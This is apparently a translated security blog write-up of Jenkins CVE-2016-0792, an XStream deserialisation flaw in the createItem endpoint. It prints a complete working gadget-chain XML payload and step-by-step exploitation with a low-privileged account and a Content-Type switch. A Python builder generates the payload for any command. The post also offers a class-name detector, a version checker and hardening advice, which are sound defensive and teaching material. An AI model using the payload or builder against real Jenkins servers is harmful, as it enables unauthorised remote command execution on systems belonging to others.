Vulnerability Overview:
In February this year the foreign site Contrast Security published the details of a vulnerability that Jenkins had recently fixed: an API reachable by a low-privileged user leads to server-side command execution. An attacker holding only a low-privileged account sends a crafted XML document to a server-side interface; when the server parses it (Jenkins deserialises the body with XStream), the objects described in the document invoke an API that runs an external command.
Exploitation steps:
1. Log in as a low-privileged user (here the account "test").
The account's permissions are: Overall/Read plus Job/Create.
POST the XML document below to the create-item endpoint. The job name is arbitrary; qt-sec is used here, so the full URL is:
http://178.18.120.133:8181/createItem?name=qt-sec
The XML document is as follows (the string nodes under <command>, highlighted in red in the original, are the program to execute and its argument):
<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="groovy.util.Expando" reference="../../../.."/>
            <owner class="java.lang.ProcessBuilder">
              <command>
                <string>touch</string>
                <string>/tmp/qingteng-test-1</string>
              </command>
              <redirectErrorStream>false</redirectErrorStream>
            </owner>
            <resolveStrategy>0</resolveStrategy>
            <directive>0</directive>
            <parameterTypes/>
            <maximumNumberOfParameters>0</maximumNumberOfParameters>
            <method>start</method>
          </org.codehaus.groovy.runtime.MethodClosure>
        </entry>
      </expandoProperties>
    </groovy.util.Expando>
    <int>1</int>
  </entry>
</map>
2. Intercept and modify the request with Burp Suite.
Simply change the Content-Type header from application/x-www-form-urlencoded to application/xml and forward the request.
Forwarding the intercepted request unmodified produces a response carrying the error "No mode given" (Jenkins treats a form-encoded body as the web UI's "new job" form and complains that the required mode field is missing), and the test shows the command does not execute:
Forwarding it with the Content-Type changed produces a success response; the body is now parsed as XML, the test command runs, and the file /tmp/qingteng-test-1 is created on the target server:
The resulting file is shown below:
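The following is an added example, not code from the original post or from Jenkins: it rebuilds the gadget document above for an arbitrary argv with xml.etree (so the argument strings are XML-escaped properly, which hand-editing the payload gets wrong for characters such as < and &), and pairs it with a small detector that walks an incoming XML body and reports the XStream gadget classes it finds. The benign config.xml is constructed for the example; it passes clean even though it also contains a <command> element, which is why the check keys on class names rather than on element names such as command. Function and constant names are the example's own.

```python
"""Payload builder and detector for the Jenkins createItem XStream gadget.

Added example, not part of the original post or of Jenkins. The builder
reproduces the document shown above for any argv; the detector inspects an
XML body before it would reach XStream. Names here are the example's own.
"""
import xml.etree.ElementTree as ET

# Types that appear in the gadget chain but never in a legitimate job config.xml.
SUSPICIOUS_TYPES = {
    "java.lang.ProcessBuilder",
    "org.codehaus.groovy.runtime.MethodClosure",
    "groovy.util.Expando",
}


def build_createitem_payload(argv):
    """Build the page's payload: a Map whose key is an Expando with a
    'hashCode' property bound to ProcessBuilder.start, so that computing the
    key's hash during deserialisation runs the command. ET escapes argv."""
    root = ET.Element("map")
    entry = ET.SubElement(root, "entry")
    expando = ET.SubElement(entry, "groovy.util.Expando")
    props = ET.SubElement(expando, "expandoProperties")
    pentry = ET.SubElement(props, "entry")
    ET.SubElement(pentry, "string").text = "hashCode"
    closure = ET.SubElement(pentry, "org.codehaus.groovy.runtime.MethodClosure")
    ET.SubElement(closure, "delegate",
                  {"class": "groovy.util.Expando", "reference": "../../../.."})
    owner = ET.SubElement(closure, "owner", {"class": "java.lang.ProcessBuilder"})
    command = ET.SubElement(owner, "command")
    for arg in argv:                      # one <string> per argv element
        ET.SubElement(command, "string").text = arg
    ET.SubElement(owner, "redirectErrorStream").text = "false"
    ET.SubElement(closure, "resolveStrategy").text = "0"
    ET.SubElement(closure, "directive").text = "0"
    ET.SubElement(closure, "parameterTypes")
    ET.SubElement(closure, "maximumNumberOfParameters").text = "0"
    ET.SubElement(closure, "method").text = "start"
    ET.SubElement(entry, "int").text = "1"
    return ET.tostring(root, encoding="unicode")


def find_gadget_indicators(xml_body):
    """Return the set of suspicious type names present as element tags or as
    'class' attributes. An empty set means nothing matched (or not XML)."""
    hits = set()
    try:
        root = ET.fromstring(xml_body)
    except ET.ParseError:
        return hits
    for el in root.iter():
        if el.tag in SUSPICIOUS_TYPES:
            hits.add(el.tag)
        cls = el.get("class")
        if cls in SUSPICIOUS_TYPES:
            hits.add(cls)
    return hits


# Constructed sample of an ordinary freestyle job config.xml: it has a
# <command> element too, but no gadget class names, so it must pass clean.
BENIGN_CONFIG = """<project>
  <description>constructed sample job</description>
  <builders>
    <hudson.tasks.Shell>
      <command>echo hello</command>
    </hudson.tasks.Shell>
  </builders>
</project>
"""

if __name__ == "__main__":
    payload = build_createitem_payload(["touch", "/tmp/qingteng-test-1"])
    print(payload)
    print(sorted(find_gadget_indicators(payload)))
    print(sorted(find_gadget_indicators(BENIGN_CONFIG)))
```

A reverse proxy or a pre-deserialisation filter in front of createItem could apply find_gadget_indicators to XML bodies as a stop-gap, but it is a denylist of three known classes and not a substitute for the version upgrade below.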
Exploitation summary:
1. Permission requirements:
Whether the account is anonymous or logged in, it must hold two permissions: Overall/Read and Job/Create. (More permissions do no harm; an account with Administer needs nothing else, because Administer is the highest privilege, so that case is not considered here.) Job/Create is required because the vulnerability is triggered through the createItem API used to create jobs, and Overall/Read is the most basic Jenkins permission: without it the user cannot see anything.
2. Version requirements:
Jenkins versions earlier than 1.650 are affected (1.650 fixed the issue; the corresponding LTS fix is 1.642.2).
3. POST content type:
When sending the crafted XML document to the server-side interface, the Content-Type must be an XML type (application/xml); otherwise the body is not parsed as XML and the command never runs.
Hardening recommendations
- Update Jenkins to 1.650 or later (1.642.2 or later on the LTS line).
- Put Jenkins behind access control: keep it on the internal network and do not expose it to the Internet.
- Disable anonymous access to Jenkins.
- Make sure no Jenkins account uses a weak password.
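Added example (not from the original post or from the Jenkins project) for the first hardening item: Jenkins sends its version in the X-Jenkins response header, and the check below reads that header out of captured response text and decides whether the instance predates the fix. The fix versions are those of the Jenkins advisory for this issue, 1.650 on the main line and 1.642.2 on the LTS line; the LTS case is why a plain "less than 1.650" comparison is not enough. The sample response is constructed, and the function names are the example's own.

```python
"""Version gate for CVE-2016-0792.

Added example, not from the original post. Jenkins advertises its version in
the X-Jenkins response header of every response (including 403s), so a version
check needs no credentials. Fix versions from the Jenkins advisory:
mainline 1.650, LTS 1.642.2. An LTS release on the 1.642.x line at or above
1.642.2 is fixed even though it sorts below 1.650 numerically.
"""
import re
from typing import Optional, Tuple

FIXED_MAINLINE = (1, 650)
FIXED_LTS = (1, 642, 2)   # LTS line 1.642.x; older LTS lines (1.625.x, ...) are all affected


def parse_version(text: str) -> Tuple[int, ...]:
    """'1.642.2' -> (1, 642, 2). Accepts a bare version or a whole header line."""
    m = re.search(r"\d+(?:\.\d+)+", text)
    if not m:
        raise ValueError(f"no dotted version in {text!r}")
    return tuple(int(p) for p in m.group(0).split("."))


def is_vulnerable_version(version: str) -> bool:
    """True when the version predates the fix on its own release line."""
    v = parse_version(version)
    if v[:2] == (1, 642) and len(v) >= 3:   # LTS line with its own fix point
        return v < FIXED_LTS
    return v[:2] < FIXED_MAINLINE          # mainline (and older LTS lines): before 1.650


def version_from_response(raw_response: str) -> Optional[str]:
    """Pull the X-Jenkins header value out of raw HTTP response text."""
    for line in raw_response.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "x-jenkins":
            return value.strip()
    return None


def assess(raw_response: str) -> Tuple[Optional[str], Optional[bool]]:
    """(version, vulnerable), or (None, None) when no X-Jenkins header is present."""
    ver = version_from_response(raw_response)
    if ver is None:
        return None, None
    return ver, is_vulnerable_version(ver)


# Constructed sample: header block of a Jenkins response as seen in Burp.
# The version value is made up for the example.
SAMPLE_RESPONSE = (
    "HTTP/1.1 403 Forbidden\r\n"
    "Server: Jetty(9.2.z-SNAPSHOT)\r\n"
    "X-Jenkins: 1.642.1\r\n"
    "X-Jenkins-Session: 4f5c2d1a\r\n"
    "Content-Type: text/html;charset=UTF-8\r\n"
    "\r\n"
)

if __name__ == "__main__":
    print(assess(SAMPLE_RESPONSE))   # ('1.642.1', True)
```

The header can be hidden by a reverse proxy, in which case assess returns (None, None) and the version has to be confirmed another way; an absent header is not evidence of a patched instance.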
Reference Links:
https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream
https://www.seebug.org/vuldb/ssvid-90813
https://www.youtube.com/watch?v=JgjYrwqI6nA
http://blog.csdn.net/wangmuming/article/details/22926025
Jenkins CVE-2016-0792 exploitation and remediation advice